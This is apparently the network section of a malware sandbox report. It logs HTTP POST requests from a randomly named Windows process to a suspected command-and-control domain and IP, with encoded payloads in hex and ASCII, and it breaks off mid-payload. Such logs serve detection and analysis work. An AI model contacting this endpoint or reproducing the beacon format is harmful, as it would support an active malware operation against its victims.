                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                28198.177.123.10680192.168.11.2050155C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:29:34.928937912 CET667OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.visionquestengage.life
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 524
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.visionquestengage.life
                                                                                                                                                                                                Referer: http://www.visionquestengage.life/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 43 6b 31 32 51 68 6f 4c 7a 6a 63 6d 4e 69 56 59 75 41 32 52 56 66 6e 38 74 5a 41 7a 56 66 33 68 79 7a 7a 68 74 2b 39 4b 59 54 4b 78 62 37 31 74 65 41 2b 45 7a 74 79 62 4b 41 64 41 33 45 53 66 36 4a 4a 73 66 34 79 59 74 31 61 47 4a 4b 78 44 39 58 35 4e 49 4e 53 35 53 78 75 7a 4b 67 69 68 7a 75 79 2f 37 44 34 62 78 4e 2b 32 43 69 71 77 49 62 38 2f 45 71 78 64 41 38 77 6e 6a 73 44 38 4f 33 6d 75 43 2f 62 62 78 62 53 35 7a 53 38 74 36 72 41 7a 57 73 70 4d 31 4f 58 73 50 5a 66 4d 58 77 54 77 45 6a 31 71 53 61 49 44 58 63 70 59 31 6c 61 35 43 41 51 47 62 31 63 74 4b 69 4d 54 77 36 46 32 41 4c 39 48 49 78 6f 43 47 74 6c 6f 30 55 4d 66 67 63 71 4e 49 62 56 62 37 5a 49 6e 5a 4e 54 51 4b 33 4d 50 35 72 4e 73 50 39 7a 65 37 68 6d 76 43 63 45 50 4c 59 50 41 48 67 44 36 63 4c 44 33 7a 46 64 34 44 76 76 52 6c 47 5a 6f 4c 4c 59 6a 4b 4b 46 34 6e 73 30 4c 79 5a 39 33 58 32 4b 5a 33 4f 34 73 35 30 61 69 69 75 70 77 76 71 2f 48 30 6b 66 52 55 34 63 5a 59 69 55 30 57 74 73 65 6a 37 64 6d 43 6b 62 48 6e 4f 69 75 73 57 43 30 73 62 34 77 6a 59 63 52 2b 78 56 57 51 7a 78 42 65 45 4e 58 55 56 31 69 46 7a 30 53 6f 6b 6a 34 44 63 64 55 4c 49 48 37 7a 7a 48 6a 7a 42 42 59 36 41 51 43 74 41 67 56 2b 45 7a 39 44 6a 54 66 6a 58 47 77 69 53 4a 4d 74 61 66 72 32 55 42 62 34 2f 59 6a 55 38 61 34 73 44 39 6f 6c 49 64 65 34 41 34 77 7a 61 57 35 55 67 38 4a 36 65 50 49 79 2b 75 4a 42 51 62 45 39 71 63 6c 4e 32 57 6e 61 6d 50 6d 76 65 72 57 75 36 50 56 56 59 4e 53 47 75 61 39 77 48 6c 6b 4f 6f 45 74 52 47 54 46 6d 63 4c 63 34 44 57 79 50 79 57 46 34 36 63 4f 37 2b 63 3d
                                                                                                                                                                                                Data Ascii: T6I=Ck12QhoLzjcmNiVYuA2RVfn8tZAzVf3hyzzht+9KYTKxb71teA+EztybKAdA3ESf6JJsf4yYt1aGJKxD9X5NINS5SxuzKgihzuy/7D4bxN+2CiqwIb8/EqxdA8wnjsD8O3muC/bbxbS5zS8t6rAzWspM1OXsPZfMXwTwEj1qSaIDXcpY1la5CAQGb1ctKiMTw6F2AL9HIxoCGtlo0UMfgcqNIbVb7ZInZNTQK3MP5rNsP9ze7hmvCcEPLYPAHgD6cLD3zFd4DvvRlGZoLLYjKKF4ns0LyZ93X2KZ3O4s50aiiupwvq/H0kfRU4cZYiU0Wtsej7dmCkbHnOiusWC0sb4wjYcR+xVWQzxBeENXUV1iFz0Sokj4DcdULIH7zzHjzBBY6AQCtAgV+Ez9DjTfjXGwiSJMtafr2UBb4/YjU8a4sD9olIde4A4wzaW5Ug8J6ePIy+uJBQbE9qclN2WnamPmverWu6PVVYNSGua9wHlkOoEtRGTFmcLc4DWyPyWF46cO7+c=
                                                                                                                                                                                                Nov 17, 2023 19:29:35.235759974 CET667INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:29:35 GMT
                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                Content-Length: 389
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                28192.168.11.2050155198.177.123.10680C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:29:34.928937912 CET667OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.visionquestengage.life
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 524
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.visionquestengage.life
                                                                                                                                                                                                Referer: http://www.visionquestengage.life/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 43 6b 31 32 51 68 6f 4c 7a 6a 63 6d 4e 69 56 59 75 41 32 52 56 66 6e 38 74 5a 41 7a 56 66 33 68 79 7a 7a 68 74 2b 39 4b 59 54 4b 78 62 37 31 74 65 41 2b 45 7a 74 79 62 4b 41 64 41 33 45 53 66 36 4a 4a 73 66 34 79 59 74 31 61 47 4a 4b 78 44 39 58 35 4e 49 4e 53 35 53 78 75 7a 4b 67 69 68 7a 75 79 2f 37 44 34 62 78 4e 2b 32 43 69 71 77 49 62 38 2f 45 71 78 64 41 38 77 6e 6a 73 44 38 4f 33 6d 75 43 2f 62 62 78 62 53 35 7a 53 38 74 36 72 41 7a 57 73 70 4d 31 4f 58 73 50 5a 66 4d 58 77 54 77 45 6a 31 71 53 61 49 44 58 63 70 59 31 6c 61 35 43 41 51 47 62 31 63 74 4b 69 4d 54 77 36 46 32 41 4c 39 48 49 78 6f 43 47 74 6c 6f 30 55 4d 66 67 63 71 4e 49 62 56 62 37 5a 49 6e 5a 4e 54 51 4b 33 4d 50 35 72 4e 73 50 39 7a 65 37 68 6d 76 43 63 45 50 4c 59 50 41 48 67 44 36 63 4c 44 33 7a 46 64 34 44 76 76 52 6c 47 5a 6f 4c 4c 59 6a 4b 4b 46 34 6e 73 30 4c 79 5a 39 33 58 32 4b 5a 33 4f 34 73 35 30 61 69 69 75 70 77 76 71 2f 48 30 6b 66 52 55 34 63 5a 59 69 55 30 57 74 73 65 6a 37 64 6d 43 6b 62 48 6e 4f 69 75 73 57 43 30 73 62 34 77 6a 59 63 52 2b 78 56 57 51 7a 78 42 65 45 4e 58 55 56 31 69 46 7a 30 53 6f 6b 6a 34 44 63 64 55 4c 49 48 37 7a 7a 48 6a 7a 42 42 59 36 41 51 43 74 41 67 56 2b 45 7a 39 44 6a 54 66 6a 58 47 77 69 53 4a 4d 74 61 66 72 32 55 42 62 34 2f 59 6a 55 38 61 34 73 44 39 6f 6c 49 64 65 34 41 34 77 7a 61 57 35 55 67 38 4a 36 65 50 49 79 2b 75 4a 42 51 62 45 39 71 63 6c 4e 32 57 6e 61 6d 50 6d 76 65 72 57 75 36 50 56 56 59 4e 53 47 75 61 39 77 48 6c 6b 4f 6f 45 74 52 47 54 46 6d 63 4c 63 34 44 57 79 50 79 57 46 34 36 63 4f 37 2b 63 3d
                                                                                                                                                                                                Data Ascii: T6I=Ck12QhoLzjcmNiVYuA2RVfn8tZAzVf3hyzzht+9KYTKxb71teA+EztybKAdA3ESf6JJsf4yYt1aGJKxD9X5NINS5SxuzKgihzuy/7D4bxN+2CiqwIb8/EqxdA8wnjsD8O3muC/bbxbS5zS8t6rAzWspM1OXsPZfMXwTwEj1qSaIDXcpY1la5CAQGb1ctKiMTw6F2AL9HIxoCGtlo0UMfgcqNIbVb7ZInZNTQK3MP5rNsP9ze7hmvCcEPLYPAHgD6cLD3zFd4DvvRlGZoLLYjKKF4ns0LyZ93X2KZ3O4s50aiiupwvq/H0kfRU4cZYiU0Wtsej7dmCkbHnOiusWC0sb4wjYcR+xVWQzxBeENXUV1iFz0Sokj4DcdULIH7zzHjzBBY6AQCtAgV+Ez9DjTfjXGwiSJMtafr2UBb4/YjU8a4sD9olIde4A4wzaW5Ug8J6ePIy+uJBQbE9qclN2WnamPmverWu6PVVYNSGua9wHlkOoEtRGTFmcLc4DWyPyWF46cO7+c=
                                                                                                                                                                                                Nov 17, 2023 19:29:35.235759974 CET667INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:29:35 GMT
                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                Content-Length: 389
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                29192.168.11.2050156198.177.123.10680C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:29:37.618518114 CET680OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.visionquestengage.life
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 52912
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.visionquestengage.life
                                                                                                                                                                                                Referer: http://www.visionquestengage.life/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 43 6b 31 32 51 68 6f 4c 7a 6a 63 6d 4e 69 56 59 75 41 32 52 56 66 6e 38 74 5a 41 7a 56 66 33 68 79 7a 7a 68 74 2b 39 4b 59 54 53 78 61 4a 39 74 64 6e 71 45 77 74 79 62 57 51 64 37 33 45 53 34 36 4a 78 67 66 34 75 6d 74 33 79 47 4a 5a 35 44 39 6c 42 4e 4e 4e 53 36 65 52 75 39 62 51 69 31 7a 75 75 72 37 44 45 6c 78 39 36 32 4e 42 69 77 66 59 45 67 62 4b 78 62 41 38 77 72 6e 73 44 30 4f 33 6a 77 43 2f 48 62 78 5a 57 35 78 6e 34 74 70 4d 30 7a 66 63 70 44 76 2b 58 76 41 35 66 31 58 77 58 38 45 6a 30 58 53 59 6b 44 58 66 68 59 32 6d 43 2b 42 67 51 47 52 56 63 71 41 43 51 58 77 36 6f 72 41 4c 35 48 49 79 6f 43 41 4e 6c 6f 6b 6d 6c 4a 6b 38 71 58 43 37 56 32 2f 5a 45 2f 5a 4a 36 68 4b 31 67 50 34 59 78 73 4a 65 72 65 36 41 6d 76 65 73 45 4e 46 34 50 74 4e 41 44 32 63 50 66 52 7a 46 39 6f 44 74 6a 52 6b 6b 52 6f 4f 71 59 67 61 61 46 69 6b 73 31 66 32 5a 78 6a 58 32 37 59 33 4f 34 47 35 31 65 69 6a 65 35 77 73 75 6a 45 35 55 66 57 63 59 64 5a 4b 69 49 2b 57 74 77 57 6a 36 6c 32 43 6e 33 48 68 75 69 75 6d 51 4b 31 6b 72 35 34 72 34 63 44 36 78 55 4f 51 7a 74 56 65 48 42 48 55 45 4a 69 45 48 6f 53 73 30 6a 37 42 38 64 71 43 6f 48 39 6c 44 48 6a 7a 42 4d 70 36 41 4d 43 74 30 49 56 2f 30 44 39 56 67 37 66 76 33 47 32 69 53 49 51 74 61 61 56 32 55 35 31 34 38 77 64 55 2b 57 34 73 58 5a 6f 72 70 64 64 39 77 34 31 33 61 57 51 5a 41 78 52 36 65 54 32 79 36 4b 7a 55 78 37 45 38 71 73 6c 4a 32 57 6b 4b 57 50 68 6f 65 72 45 71 36 54 7a 56 59 52 6b 47 74 47 74 77 48 4e 6b 50 35 6c 42 46 55 50 4f 2b 38 57 38 6b 6b 71 55 42 46 76 4b 75 37 39 4b 6c 61 2b 53 74 7a 4e 6a 38 67 41 46 31 65 75 63 70 39 7a 5a 6f 2b 64 4f 6a 6d 36 6c 31 33 71 38 39 74 32 6d 35 45 6d 67 74 4d 5a 64 66 71 2f 72 77 67 77 56 41 79 56 79 6b 35 31 6e 62 66 39 66 54 35 33 34 32 6d 44 69 6f 52 62 4b 4c 49 49 44 61 6d 41 58 56 6e 55 44 6b 7a 6b 66 36 52 38 71 74 6b 49 72 67 4c 74 4e 31 7a 35 44 2b 50 58 4f 5a 2f 6b 39 57 72 7a 45 33 58 69 71 45 4a 63 63 48 74 51 72 6d 44 36 64 66 4c 34 77 6e 52 57 38 46 41 59 6b 2b 6e 41 6e 79 4c 4d 32 37 33 33 2f 42 76 41 53 50 74 44 72 6f 6c 59 36 79 75 53 64 69 58 64 36 6f 67 77 50 34 37 4b 54 35 66 36 4b 67 48 35 75 49 66 62 39 6e 51 4d 6f 6b 34 4e 48 7a 41 67 4a 75 77 49 71 72 73 50 2b 67 65 4c 48 4c 74 38 39 58 59 67 53 6d 46 56 42 58 72 30 64 72 7a 32 52 4f 7a 6a 78 5a 6d 39 4d 6d 63 52 31 4b 2f 78 55 46 75 39 67 5a 62 56 44 6e 43 36 61 6c 4f 6a 32 79 69 6c 31 55 47 56 71 6b 49 32 48 4c 64 44 77 79 6c 61 67 37 71 6a 62 5a 63 6c 4a 45 57 59 38 4c 4c 4c 70 54 48 6e 32 68 4c 76 75 73 6a 62 4c 65 7a 59 50 56 67 62 36 55 34 68 46 67 43 43 36 67 44 38 73 30 70 30 58 48 4b 61 6a 4f 4b 2b 4a 50 6d 2b 5a 42 77 59 64 6b 65 33 65 31 45 42 49 63 67 53 45 45 50 70 71 4c 78 57 30 58 37 6c 4f 75 69 52 30 56 4b 45 42 4d 6b 5a 49 6a 47 36 69 46 4e 33 68 6f 71 66 6b 38 65 56 65 69 68 2f 6f 70 6a 43 38 30 38 4c 34 47 34 33 78 71 65 61 4d 78 46 4f 48 62 64 6d 6d 79 4b 58 58 41 38 69 73 58 76 31 35 57 39 76 38 62 73 6a 37 58 59 48 64 4d 52 55 63 63 63 75 46 69 4e 34 6c 54 2f 48 6d 47 53 71 59 46 59 77 76 41 53 72 64 2f 4f 39 7a 79 4e 75 77 42 70 31 45 34 55 66 76 52 43 48 53 43 5a 75 6e 67 36 56 45 2b 69 62 72 70 35 52 66 70 6f 61 64 56 4b 67 66 42 43 6e 64 74 4e 45 64 36 34 4c 49 57 73 56 62 79 72 36 7a 47 35 69 6b 6d 43 38 4d 63 6b 54 78 6d 73 64 63 4c 42 45 33 47 37 6a 79 68 59 5a 31 6d 7a 7a 57 30 5a 4d 58 43 62 34 2b 78 69 64 50 2f 37 39 71 73 4f 31 59 63 50 43 6a 54 33 63 53 64 33 48 7a 70 34 47 6e 47 47 63 48 56 71 49 39 63 53 74 34 33 65 77 71 64 39 59 45 73 53 59 6c 50 79 2f 4b 49 38 30 38 6c 61 49 79 33 6d 55 61 47 4a 72 44 71 6c 6a 4e 65 66 74 6d 36 45 64 78 59 36 4e 46 33 30 48 6c 6e 63 4e 5a 64 41 32 4c 76 44 39 70 48 50 34 79 6e 44 70 68 6b 6d 51 47 6c 32 7a 4e 4e 57 2f 58 65 46 54 61 43 61 6c 47 73 6d 6c 56 48 54 6e 7a 72 45 43 53 4a 66 53 57 4e 74 4c 54 51 35 36 38 47 4d 4c 74 61 4a 37 66 59 63 42 57 55 2b 6f 34 38 6d 38 53 45 49 6a 56 79 6c 50 76 52 2f 56 4c 50 66 34 49 49 4f 59 72 42 54 56 68 74 69 6c 36 76 56 6a 78 37 4c 59 56 2f 30 61 58 39 59 74 57 6b 77 50 4c 37 75 78 61 64 6d 76 4b 50 58 6e 43 68 6b 70 4d 49 35 6e
                                                                                                                                                                                                Data Ascii: T6I=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
                                                                                                                                                                                                Nov 17, 2023 19:29:37.789163113 CET682OUTData Raw: 52 68 6f 43 72 62 6c 47 49 56 2b 7a 54 2f 4f 69 46 4e 44 56 42 44 2b 6c 49 54 56 6e 33 77 56 6d 64 51 50 4a 75 75 31 44 64 41 43 50 33 62 6c 42 62 50 50 67 33 42 57 31 75 58 54 36 51 51 66 72 63 44 50 4d 79 53 44 56 6c 32 76 52 74 56 45 30 45 75
